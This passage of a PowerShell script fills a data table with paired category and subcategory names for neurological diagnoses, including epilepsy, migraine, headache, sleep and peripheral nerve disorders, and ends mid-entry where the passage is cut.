$null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, intractable","Localization-related (focal) (partial) symptomatic epilepsy and epileptic syndromes with complex partial seizures, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Generalized idiopathic epilepsy and epileptic syndromes, not intractable","Generalized idiopathic epilepsy and epileptic syndromes, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Generalized idiopathic epilepsy and epileptic syndromes, not intractable","Generalized idiopathic epilepsy and epileptic syndromes, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Generalized idiopathic epilepsy and epileptic syndromes, intractable","Generalized idiopathic epilepsy and epileptic syndromes, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Generalized idiopathic epilepsy and epileptic syndromes, intractable","Generalized idiopathic epilepsy and epileptic syndromes, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Absence epileptic syndrome, not intractable","Absence epileptic syndrome, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Absence epileptic syndrome, not intractable","Absence epileptic syndrome, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Absence epileptic syndrome, intractable","Absence epileptic syndrome, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Absence epileptic syndrome, intractable","Absence epileptic syndrome, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Juvenile myoclonic epilepsy, not intractable","Juvenile myoclonic epilepsy, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Juvenile myoclonic epilepsy, not intractable","Juvenile myoclonic epilepsy, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Juvenile myoclonic epilepsy, intractable","Juvenile myoclonic epilepsy, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Juvenile myoclonic epilepsy, intractable","Juvenile myoclonic epilepsy, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Other generalized epilepsy and epileptic syndromes, not intractable","Other generalized epilepsy and epileptic syndromes, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Other generalized epilepsy and epileptic syndromes, not intractable","Other generalized epilepsy and epileptic syndromes, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Other generalized epilepsy and epileptic syndromes, intractable","Other generalized epilepsy and epileptic syndromes, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Other generalized epilepsy and epileptic syndromes, intractable","Other generalized epilepsy and epileptic syndromes, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Epileptic seizures related to external causes, not intractable","Epileptic seizures related to external causes, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Epileptic seizures related to external causes, not intractable","Epileptic seizures related to external causes, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Other epilepsy","Other epilepsy, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Other epilepsy","Other epilepsy, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Other epilepsy","Other epilepsy, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Other epilepsy","Other epilepsy, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Lennox-Gastaut syndrome","Lennox-Gastaut syndrome, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Lennox-Gastaut syndrome","Lennox-Gastaut syndrome, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Lennox-Gastaut syndrome","Lennox-Gastaut syndrome, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Lennox-Gastaut syndrome","Lennox-Gastaut syndrome, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Epileptic spasms","Epileptic spasms, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Epileptic spasms","Epileptic spasms, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Epileptic spasms","Epileptic spasms, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Epileptic spasms","Epileptic spasms, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Other seizures","Other seizures") + $null = $DiagnosisList.Rows.Add("Epilepsy, unspecified, not intractable","Epilepsy, unspecified, not intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Epilepsy, unspecified, not intractable","Epilepsy, unspecified, not intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Epilepsy, unspecified, intractable","Epilepsy, unspecified, intractable, with status epilepticus") + $null = $DiagnosisList.Rows.Add("Epilepsy, unspecified, intractable","Epilepsy, unspecified, intractable, without status epilepticus") + $null = $DiagnosisList.Rows.Add("Migraine without aura, not intractable","Migraine without aura, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine without aura, not intractable","Migraine without aura, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine without aura, intractable","Migraine without aura, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine without aura, intractable","Migraine without aura, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine with aura, not intractable","Migraine with aura, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine with aura, not intractable","Migraine with aura, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine with aura, intractable","Migraine with aura, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine with aura, intractable","Migraine with aura, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Hemiplegic migraine, not intractable","Hemiplegic migraine, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Hemiplegic migraine, not intractable","Hemiplegic migraine, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Hemiplegic migraine, intractable","Hemiplegic migraine, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Hemiplegic migraine, intractable","Hemiplegic migraine, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura without cerebral infarction, not intractable","Persistent migraine aura without cerebral infarction, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura without cerebral infarction, not intractable","Persistent migraine aura without cerebral infarction, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura without cerebral infarction, intractable","Persistent migraine aura without cerebral infarction, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura without cerebral infarction, intractable","Persistent migraine aura without cerebral infarction, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura with cerebral infarction, not intractable","Persistent migraine aura with cerebral infarction, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura with cerebral infarction, not intractable","Persistent migraine aura with cerebral infarction, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura with cerebral infarction, intractable","Persistent migraine aura with cerebral infarction, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Persistent migraine aura with cerebral infarction, intractable","Persistent migraine aura with cerebral infarction, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Chronic migraine without aura, not intractable","Chronic migraine without aura, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Chronic migraine without aura, not intractable","Chronic migraine without aura, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Chronic migraine without aura, intractable","Chronic migraine without aura, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Chronic migraine without aura, intractable","Chronic migraine without aura, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Cyclical vomiting","Cyclical vomiting, not intractable") + $null = $DiagnosisList.Rows.Add("Cyclical vomiting","Cyclical vomiting, intractable") + $null = $DiagnosisList.Rows.Add("Ophthalmoplegic migraine","Ophthalmoplegic migraine, not intractable") + $null = $DiagnosisList.Rows.Add("Ophthalmoplegic migraine","Ophthalmoplegic migraine, intractable") + $null = $DiagnosisList.Rows.Add("Periodic headache syndromes in child or adult","Periodic headache syndromes in child or adult, not intractable") + $null = $DiagnosisList.Rows.Add("Periodic headache syndromes in child or adult","Periodic headache syndromes in child or adult, intractable") + $null = $DiagnosisList.Rows.Add("Abdominal migraine","Abdominal migraine, not intractable") + $null = $DiagnosisList.Rows.Add("Abdominal migraine","Abdominal migraine, intractable") + $null = $DiagnosisList.Rows.Add("Other migraine, not intractable","Other migraine, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Other migraine, not intractable","Other migraine, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Other migraine, intractable","Other migraine, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Other migraine, intractable","Other migraine, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Menstrual migraine, not intractable","Menstrual migraine, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Menstrual migraine, not intractable","Menstrual migraine, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Menstrual migraine, intractable","Menstrual migraine, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Menstrual migraine, intractable","Menstrual migraine, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine, unspecified, not intractable","Migraine, unspecified, not intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine, unspecified, not intractable","Migraine, unspecified, not intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine, unspecified, intractable","Migraine, unspecified, intractable, with status migrainosus") + $null = $DiagnosisList.Rows.Add("Migraine, unspecified, intractable","Migraine, unspecified, intractable, without status migrainosus") + $null = $DiagnosisList.Rows.Add("Cluster headache syndrome, unspecified","Cluster headache syndrome, unspecified, intractable") + $null = $DiagnosisList.Rows.Add("Cluster headache syndrome, unspecified","Cluster headache syndrome, unspecified, not intractable") + $null = $DiagnosisList.Rows.Add("Episodic cluster headache","Episodic cluster headache, intractable") + $null = $DiagnosisList.Rows.Add("Episodic cluster headache","Episodic cluster headache, not intractable") + $null = $DiagnosisList.Rows.Add("Chronic cluster headache","Chronic cluster headache, intractable") + $null = $DiagnosisList.Rows.Add("Chronic cluster headache","Chronic cluster headache, not intractable") + $null = $DiagnosisList.Rows.Add("Episodic paroxysmal hemicrania","Episodic paroxysmal hemicrania, intractable") + $null = $DiagnosisList.Rows.Add("Episodic paroxysmal hemicrania","Episodic paroxysmal hemicrania, not intractable") + $null = $DiagnosisList.Rows.Add("Chronic paroxysmal hemicrania","Chronic paroxysmal hemicrania, intractable") + $null = $DiagnosisList.Rows.Add("Chronic paroxysmal hemicrania","Chronic paroxysmal hemicrania, not intractable") + $null = $DiagnosisList.Rows.Add("Short lasting unilateral neuralgiform headache with conjunctival injection and tearing (SUNCT)","Short lasting unilateral neuralgiform headache with conjunctival injection and tearing (SUNCT), intractable") + $null = $DiagnosisList.Rows.Add("Short lasting unilateral neuralgiform headache with conjunctival injection and tearing (SUNCT)","Short lasting unilateral neuralgiform headache with conjunctival injection and tearing (SUNCT), not intractable") + $null = $DiagnosisList.Rows.Add("Other trigeminal autonomic cephalgias (TAC)","Other trigeminal autonomic cephalgias (TAC), intractable") + $null = $DiagnosisList.Rows.Add("Other trigeminal autonomic cephalgias (TAC)","Other trigeminal autonomic cephalgias (TAC), not intractable") + $null = $DiagnosisList.Rows.Add("Vascular headache, not elsewhere classified","Vascular headache, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Tension-type headache, unspecified","Tension-type headache, unspecified, intractable") + $null = $DiagnosisList.Rows.Add("Tension-type headache, unspecified","Tension-type headache, unspecified, not intractable") + $null = $DiagnosisList.Rows.Add("Episodic tension-type headache","Episodic tension-type headache, intractable") + $null = $DiagnosisList.Rows.Add("Episodic tension-type headache","Episodic tension-type headache, not intractable") + $null = $DiagnosisList.Rows.Add("Chronic tension-type headache","Chronic tension-type headache, intractable") + $null = $DiagnosisList.Rows.Add("Chronic tension-type headache","Chronic tension-type headache, not intractable") + $null = $DiagnosisList.Rows.Add("Post-traumatic headache, unspecified","Post-traumatic headache, unspecified, intractable") + $null = $DiagnosisList.Rows.Add("Post-traumatic headache, unspecified","Post-traumatic headache, unspecified, not intractable") + $null = $DiagnosisList.Rows.Add("Acute post-traumatic headache","Acute post-traumatic headache, intractable") + $null = $DiagnosisList.Rows.Add("Acute post-traumatic headache","Acute post-traumatic headache, not intractable") + $null = $DiagnosisList.Rows.Add("Chronic post-traumatic headache","Chronic post-traumatic headache, intractable") + $null = $DiagnosisList.Rows.Add("Chronic post-traumatic headache","Chronic post-traumatic headache, not intractable") + $null = $DiagnosisList.Rows.Add("Drug-induced headache, not elsewhere classified","Drug-induced headache, not elsewhere classified, not intractable") + $null = $DiagnosisList.Rows.Add("Drug-induced headache, not elsewhere classified","Drug-induced headache, not elsewhere classified, intractable") + $null = $DiagnosisList.Rows.Add("Complicated headache syndromes","Hemicrania continua") + $null = $DiagnosisList.Rows.Add("Complicated headache syndromes","New daily persistent headache (NDPH)") + $null = $DiagnosisList.Rows.Add("Complicated headache syndromes","Primary thunderclap headache") + $null = $DiagnosisList.Rows.Add("Complicated headache syndromes","Other complicated headache syndrome") + $null = $DiagnosisList.Rows.Add("Other specified headache syndromes","Hypnic headache") + $null = $DiagnosisList.Rows.Add("Other specified headache syndromes","Headache associated with sexual activity") + $null = $DiagnosisList.Rows.Add("Other specified headache syndromes","Primary cough headache") + $null = $DiagnosisList.Rows.Add("Other specified headache syndromes","Primary exertional headache") + $null = $DiagnosisList.Rows.Add("Other specified headache syndromes","Primary stabbing headache") + $null = $DiagnosisList.Rows.Add("Other specified headache syndromes","Other headache syndrome") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Vertebro-basilar artery syndrome") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Carotid artery syndrome (hemispheric)") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Multiple and bilateral precerebral artery syndromes") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Amaurosis fugax") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Transient global amnesia") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Other transient cerebral ischemic attacks and related syndromes") + $null = $DiagnosisList.Rows.Add("Transient cerebral ischemic attacks and related syndromes","Transient cerebral ischemic attack, unspecified") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Middle cerebral artery syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Anterior cerebral artery syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Posterior cerebral artery syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Brain stem stroke syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Cerebellar stroke syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Pure motor lacunar syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Pure sensory lacunar syndrome") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Other lacunar syndromes") + $null = $DiagnosisList.Rows.Add("Vascular syndromes of brain in cerebrovascular diseases","Other vascular syndromes of brain in cerebrovascular diseases") + $null = $DiagnosisList.Rows.Add("Insomnia","Insomnia, unspecified") + $null = $DiagnosisList.Rows.Add("Insomnia","Insomnia due to medical condition") + $null = $DiagnosisList.Rows.Add("Insomnia","Other insomnia") + $null = $DiagnosisList.Rows.Add("Hypersomnia","Hypersomnia, unspecified") + $null = $DiagnosisList.Rows.Add("Hypersomnia","Idiopathic hypersomnia with long sleep time") + $null = $DiagnosisList.Rows.Add("Hypersomnia","Idiopathic hypersomnia without long sleep time") + $null = $DiagnosisList.Rows.Add("Hypersomnia","Recurrent hypersomnia") + $null = $DiagnosisList.Rows.Add("Hypersomnia","Hypersomnia due to medical condition") + $null = $DiagnosisList.Rows.Add("Hypersomnia","Other hypersomnia") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, unspecified type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, delayed sleep phase type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, advanced sleep phase type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, irregular sleep wake type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, free running type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, jet lag type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder, shift work type") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Circadian rhythm sleep disorder in conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Circadian rhythm sleep disorders","Other circadian rhythm sleep disorder") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Sleep apnea, unspecified") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Primary central sleep apnea") + $null = $DiagnosisList.Rows.Add("Sleep apnea","High altitude periodic breathing") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Obstructive sleep apnea (adult) (pediatric)") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Idiopathic sleep related nonobstructive alveolar hypoventilation") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Congenital central alveolar hypoventilation syndrome") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Sleep related hypoventilation in conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Central sleep apnea in conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Sleep apnea","Other sleep apnea") + $null = $DiagnosisList.Rows.Add("Narcolepsy","Narcolepsy with cataplexy") + $null = $DiagnosisList.Rows.Add("Narcolepsy","Narcolepsy without cataplexy") + $null = $DiagnosisList.Rows.Add("Narcolepsy in conditions classified elsewhere","Narcolepsy in conditions classified elsewhere with cataplexy") + $null = $DiagnosisList.Rows.Add("Narcolepsy in conditions classified elsewhere","Narcolepsy in conditions classified elsewhere without cataplexy") + $null = $DiagnosisList.Rows.Add("Parasomnia","Parasomnia, unspecified") + $null = $DiagnosisList.Rows.Add("Parasomnia","Confusional arousals") + $null = $DiagnosisList.Rows.Add("Parasomnia","REM sleep behavior disorder") + $null = $DiagnosisList.Rows.Add("Parasomnia","Recurrent isolated sleep paralysis") + $null = $DiagnosisList.Rows.Add("Parasomnia","Parasomnia in conditions classified elsewhere") + $null = $DiagnosisList.Rows.Add("Parasomnia","Other parasomnia") + $null = $DiagnosisList.Rows.Add("Sleep related movement disorders","Periodic limb movement disorder") + $null = $DiagnosisList.Rows.Add("Sleep related movement disorders","Sleep related leg cramps") + $null = $DiagnosisList.Rows.Add("Sleep related movement disorders","Sleep related bruxism") + $null = $DiagnosisList.Rows.Add("Sleep related movement disorders","Other sleep related movement disorders") + $null = $DiagnosisList.Rows.Add("Other sleep disorders","Other sleep disorders") + $null = $DiagnosisList.Rows.Add("Sleep disorder, unspecified","Sleep disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of trigeminal nerve","Trigeminal neuralgia") + $null = $DiagnosisList.Rows.Add("Disorders of trigeminal nerve","Atypical facial pain") + $null = $DiagnosisList.Rows.Add("Disorders of trigeminal nerve","Other disorders of trigeminal nerve") + $null = $DiagnosisList.Rows.Add("Disorders of trigeminal nerve","Disorder of trigeminal nerve, unspecified") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Bell's palsy") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Geniculate ganglionitis") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Melkersson's syndrome") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Clonic hemifacial spasm") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Facial myokymia") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Other disorders of facial nerve") + $null = $DiagnosisList.Rows.Add("Facial nerve disorders","Disorder of facial nerve, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Disorders of olfactory nerve") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Disorders of glossopharyngeal nerve") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Disorders of vagus nerve") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Disorders of hypoglossal nerve") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Disorders of multiple cranial nerves") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Disorders of other specified cranial nerves") + $null = $DiagnosisList.Rows.Add("Disorders of other cranial nerves","Cranial nerve disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cranial nerve disorders in diseases classified elsewhere","Cranial nerve disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Brachial plexus disorders") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Lumbosacral plexus disorders") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Cervical root disorders, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Thoracic root disorders, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Lumbosacral root disorders, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Neuralgic amyotrophy") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Phantom limb syndrome with pain") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Phantom limb syndrome without pain") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Other nerve root and plexus disorders") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus disorders","Nerve root and plexus disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Nerve root and plexus compressions in diseases classified elsewhere","Nerve root and plexus compressions in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Carpal tunnel syndrome","Carpal tunnel syndrome, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Carpal tunnel syndrome","Carpal tunnel syndrome, right upper limb") + $null = $DiagnosisList.Rows.Add("Carpal tunnel syndrome","Carpal tunnel syndrome, left upper limb") + $null = $DiagnosisList.Rows.Add("Carpal tunnel syndrome","Carpal tunnel syndrome, bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Other lesions of median nerve","Other lesions of median nerve, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Other lesions of median nerve","Other lesions of median nerve, right upper limb") + $null = $DiagnosisList.Rows.Add("Other lesions of median nerve","Other lesions of median nerve, left upper limb") + $null = $DiagnosisList.Rows.Add("Other lesions of median nerve","Other lesions of median nerve, bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Lesion of ulnar nerve","Lesion of ulnar nerve, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Lesion of ulnar nerve","Lesion of ulnar nerve, right upper limb") + $null = $DiagnosisList.Rows.Add("Lesion of ulnar nerve","Lesion of ulnar nerve, left upper limb") + $null = $DiagnosisList.Rows.Add("Lesion of ulnar nerve","Lesion of ulnar nerve, bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Lesion of radial nerve","Lesion of radial nerve, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Lesion of radial nerve","Lesion of radial nerve, right upper limb") + $null = $DiagnosisList.Rows.Add("Lesion of radial nerve","Lesion of radial nerve, left upper limb") + $null = $DiagnosisList.Rows.Add("Lesion of radial nerve","Lesion of radial nerve, bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Causalgia of upper limb","Causalgia of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Causalgia of upper limb","Causalgia of right upper limb") + $null = $DiagnosisList.Rows.Add("Causalgia of upper limb","Causalgia of left upper limb") + $null = $DiagnosisList.Rows.Add("Causalgia of upper limb","Causalgia of bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of upper limb","Other specified mononeuropathies of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of upper limb","Other specified mononeuropathies of right upper limb") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of upper limb","Other specified mononeuropathies of left upper limb") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of upper limb","Other specified mononeuropathies of bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of upper limb","Unspecified mononeuropathy of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of upper limb","Unspecified mononeuropathy of right upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of upper limb","Unspecified mononeuropathy of left upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of upper limb","Unspecified mononeuropathy of bilateral upper limbs") + $null = $DiagnosisList.Rows.Add("Lesion of sciatic nerve","Lesion of sciatic nerve, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of sciatic nerve","Lesion of sciatic nerve, right lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of sciatic nerve","Lesion of sciatic nerve, left lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of sciatic nerve","Lesion of sciatic nerve, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Meralgia paresthetica","Meralgia paresthetica, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Meralgia paresthetica","Meralgia paresthetica, right lower limb") + $null = $DiagnosisList.Rows.Add("Meralgia paresthetica","Meralgia paresthetica, left lower limb") + $null = $DiagnosisList.Rows.Add("Meralgia paresthetica","Meralgia paresthetica, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Lesion of femoral nerve","Lesion of femoral nerve, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of femoral nerve","Lesion of femoral nerve, right lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of femoral nerve","Lesion of femoral nerve, left lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of femoral nerve","Lesion of femoral nerve, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Lesion of lateral popliteal nerve","Lesion of lateral popliteal nerve, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of lateral popliteal nerve","Lesion of lateral popliteal nerve, right lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of lateral popliteal nerve","Lesion of lateral popliteal nerve, left lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of lateral popliteal nerve","Lesion of lateral popliteal nerve, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Lesion of medial popliteal nerve","Lesion of medial popliteal nerve, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of medial popliteal nerve","Lesion of medial popliteal nerve, right lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of medial popliteal nerve","Lesion of medial popliteal nerve, left lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of medial popliteal nerve","Lesion of medial popliteal nerve, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Tarsal tunnel syndrome","Tarsal tunnel syndrome, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Tarsal tunnel syndrome","Tarsal tunnel syndrome, right lower limb") + $null = $DiagnosisList.Rows.Add("Tarsal tunnel syndrome","Tarsal tunnel syndrome, left lower limb") + $null = $DiagnosisList.Rows.Add("Tarsal tunnel syndrome","Tarsal tunnel syndrome, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Lesion of plantar nerve","Lesion of plantar nerve, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of plantar nerve","Lesion of plantar nerve, right lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of plantar nerve","Lesion of plantar nerve, left lower limb") + $null = $DiagnosisList.Rows.Add("Lesion of plantar nerve","Lesion of plantar nerve, bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Causalgia of lower limb","Causalgia of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Causalgia of lower limb","Causalgia of right lower limb") + $null = $DiagnosisList.Rows.Add("Causalgia of lower limb","Causalgia of left lower limb") + $null = $DiagnosisList.Rows.Add("Causalgia of lower limb","Causalgia of bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of lower limb","Other specified mononeuropathies of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of lower limb","Other specified mononeuropathies of right lower limb") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of lower limb","Other specified mononeuropathies of left lower limb") + $null = $DiagnosisList.Rows.Add("Other specified mononeuropathies of lower limb","Other specified mononeuropathies of bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of lower limb","Unspecified mononeuropathy of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of lower limb","Unspecified mononeuropathy of right lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of lower limb","Unspecified mononeuropathy of left lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified mononeuropathy of lower limb","Unspecified mononeuropathy of bilateral lower limbs") + $null = $DiagnosisList.Rows.Add("Other 